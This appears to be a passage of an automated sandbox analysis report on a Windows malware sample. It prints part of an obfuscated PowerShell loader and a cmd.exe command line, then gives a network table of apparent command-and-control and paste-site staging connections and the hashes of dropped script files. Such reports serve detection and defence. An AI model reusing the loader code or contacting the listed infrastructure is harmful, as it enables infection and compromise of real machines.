'Ve$Prg.ulSaoRyb.iaOvlD :AlDBre cvei BmenaTel lt ta Eb Eu.ilP.eCor Ce.anFrdCoe,ys T=.e$h,g .lCooDibFaaRelC,:P.UGrnFod,esCie BeAflCoiUdg FeSi+ N+Fo% $,rflar Me EeDel.eaUnn Ec.de ,j .o .uKlr.lnHoaR.l oi sEctOme.orEf.sucPuoJuuEmnTjtS. ') ;$Unilaterale=$freelancejournalister[$Decimaltabulerendes];}$Stavelsesantallets=321844;$Kopimaskine=26918;Quatrible (Placque '.n$LegKulGro GbRaaBal.a: MSHrk uM,lOvdS,e ,rKosWat,irTroH,ps Mo=Va HuGdeebytSi-.rC,eo ,n,et.beRanu.t r$B.MKyoSanAkdErnaniPat,oe ,t R ');Quatrible (Placque ' .$Blglel,uoDrbHya,pl .:SgTMei ClBehBroF e Vr,xeHi S,=St F [.iS iys.s et ,eMamVu. SCMeo .n AvEne .rUntu ]Co:Gr:FoF,irFuo m PBekaU sBeeMi6La4T.SFotF,r.niWen NgCy( t$PaSBikSnu,flQ.dHyeS rHesuntGrrSpoFepPr) c ');Quatrible (Placque ' y$AfgArlOmoStb.oaM l S:NeB aeQus at,ri FaStlC,sFl1fr0Bu5Ti Pa= kv[OmSSlyPhs BtAce,am a.FeT .eA.x Rt A.PlEBanEncOvo ,dR.i knSkgPi]Sp:Pa:T A RSS,C LI LII..EnGReeFotj.SovtvirPyi,enfagAk(Pe$ TTDyi lK,hTao FeT rCoeP ) ');Quatrible (Placque 'Me$BagaalF.oFobOcaSllGe:W KFlaDubVaeTalP lCogHjnC,i enDeg.a= R$ uBkre CsPot SiS,aGolRusKo1Te0S,5 P. ns SuRobD s ,t.er,xi SnKig (J.$B,S RtgaaArv,peB l,tsFlerasG a.en,rtInaJ.lRelToe,itArsP,,Ci$ImKNeoCepAbibam.maB,sVakEfi yn,keFo)Ep ');Quatrible $Kabellgning;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kdfars211.Arb && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 12.221.146.138:9402 | june9402xw.duckdns.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 172.67.215.45:443 | uploaddeimagens.com.br | tcp |
| US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | nzaria.org | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | nzaria.org | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 12.221.146.138:9402 | june9402xw.duckdns.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | nzaria.org | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | nzaria.org | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | nzaria.org | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 12.221.146.138:9402 | june9402xw.duckdns.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
Files
memory/2008-0-0x000007FEF6003000-0x000007FEF6004000-memory.dmp
memory/2008-1-0x0000000000880000-0x000000000088E000-memory.dmp
memory/2008-2-0x000007FEF6003000-0x000007FEF6004000-memory.dmp
memory/2008-3-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\crrlge.vbe
| MD5 | 8ec786faaa5a362811fd1619b154491a |
| SHA1 | 71bb2855f0a7310e03a314d36bee6834a4a1e0bd |
| SHA256 | a0db4681c448441398ef9c2ed196614fa9a6cbcf88292b865282d0e1cc787554 |
| SHA512 | a6d184f84b4edcb2689f69bf409e837919bac747e4dae083b54df6cc58aa4e28732cc667667b73bd85155c97b7f9247fe423cdf412d5fd4fb917857cdbe171cf |
C:\Users\Admin\AppData\Local\Temp\jnkknt.js
| MD5 | 328765aecc6d2133216750c1b177bb47 |
| SHA1 | 078149068c875b447f6d936255716e02deef08a3 |
| SHA256 | e8ea76d1543e92d8cf8446332af71ae00ffb86f15aaf22aaf5c8d3ba39e915fc |
| SHA512 | 11373f2da96edee3e0de2d9f202564a5ae2636b4555cab3d3ad2d54aeccbf20e7e2104039087a4566439a85772a9c714adc6683c5094b70d658e8f93db0e44c5 |
C:\Users\Admin\AppData\Local\Temp\jnznkv.vbs
| MD5 | 44cc7d8bb2eaa90cb7ebfe43745bf6bf |
| SHA1 | 8a8624f10c91710ddfb562816c08f4bdb86444fb |
| SHA256 | 7a23828abf2a8e261bb2ed2575f4034941524d032968f96e06e18200898202fd |
| SHA512 | 431458777fc04012c65f5282f7f5da59441ac6753f6c791051183991169cbeed34caa22bd7fde10b975db54c29fd7173e68b08414d1893e03952a2953efe289e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | a08991b3b3149042115bebb75a76ccc0 |
| SHA1 | 4f1a11c57b43422713fcb9c7af450a3a547ad11d |
| SHA256 | 827224a17beecdd911e49e0f09ab9665246f781744d1241545d6aefe2e67c788 |
| SHA512 | dc3f8319b0a7ab3e3a37447cdd60b3772bbb5e73cd44e9e58c2ad979dcd68f48f675c8a0a2626e9d3af5d4c664a9dcc52b786b69946236d8f89d12371d987fac |
